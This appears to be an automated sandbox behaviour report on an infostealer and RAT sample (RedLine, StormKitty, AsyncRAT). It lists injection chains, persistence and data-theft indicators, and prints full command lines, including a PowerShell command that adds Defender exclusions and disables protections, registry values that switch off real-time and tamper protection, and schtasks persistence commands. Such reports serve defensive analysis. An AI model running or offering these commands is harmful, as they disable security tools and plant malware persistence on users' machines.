Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A

RedLine

infostealer redline

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\ProgramData\07900588628047328197.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\ProgramData\46777832471797123856.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini C:\Windows\system32\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3060 set thread context of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 1028 set thread context of 1036 N/A C:\ProgramData\07900588628047328197.exe C:\ProgramData\07900588628047328197.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\svchost.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4238149048-355649189-894321705-1000\{A6B3229E-0612-46BD-8EFC-4BD6478802EE} C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4238149048-355649189-894321705-1000\{5F21EE14-2C92-4D6A-9A4D-018D5E9FD34D} C:\Windows\system32\svchost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\07900588628047328197.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\07900588628047328197.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\ProgramData\46777832471797123856.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4596 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 4596 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 4596 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe
PID 4544 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 4544 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 4544 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe
PID 4396 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 4396 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 4396 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe
PID 1356 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 1356 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 1356 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe
PID 1356 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 1356 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 1356 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe
PID 4396 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 4396 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 4396 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe
PID 2368 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 2368 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 2368 wrote to memory of 3140 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe
PID 4544 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 4544 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 4544 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe
PID 3140 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 3140 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 3140 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 3140 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe
PID 3140 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe
PID 3140 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe
PID 3980 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe
PID 3980 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe
PID 3980 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe
PID 1036 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe C:\Windows\SysWOW64\cmd.exe
PID 4688 wrote to memory of 3372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4688 wrote to memory of 3372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4688 wrote to memory of 3372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3372 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3372 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3372 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3372 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3372 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3372 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3372 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3372 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3372 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3060 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Windows\SysWOW64\schtasks.exe
PID 3060 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Windows\SysWOW64\schtasks.exe
PID 3060 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Windows\SysWOW64\schtasks.exe
PID 3060 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3060 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3060 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 3140 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\rundll32.exe
PID 3140 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\rundll32.exe
PID 3140 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe C:\Windows\SysWOW64\rundll32.exe
PID 3060 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif

Processes

C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe

"C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3932 -ip 3932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 1092

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe

"C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe"

C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe

C:\Users\Admin\AppData\Local\Temp\SETUP_3249\Engine.exe /TH_ID=_1564 /OriginExe="C:\Users\Admin\AppData\Local\Temp\1000092001\Delta2023.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cmd < Yugoslavia

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell get-process avastui

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell get-process avgui

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^TiesHighsFridayPromisedOrganismsPromotedStronglyBannersTermExplainOrganisedPhpLastingMaritime$" Finding

C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif

29190\\Bondage.exe.pif 29190\\M

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 18

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "dZVxEGlqbg" /tr "C:\Users\Admin\AppData\Roaming\claRXiEwVe\dZVxEGlqbg.exe.com C:\Users\Admin\AppData\Roaming\claRXiEwVe\H" /sc onlogon /F /RL HIGHEST

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif

C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main

C:\ProgramData\07900588628047328197.exe

"C:\ProgramData\07900588628047328197.exe"

C:\ProgramData\46777832471797123856.exe

"C:\ProgramData\46777832471797123856.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe; Set-MpPreference -SubmitSamplesConsent NeverSend -PUAProtection Disabled

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SoJFlNPT" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDF3F.tmp"

C:\ProgramData\07900588628047328197.exe

"{path}"

C:\ProgramData\07900588628047328197.exe

"{path}"

C:\ProgramData\07900588628047328197.exe

"{path}"

C:\ProgramData\07900588628047328197.exe

"{path}"

Network


Files
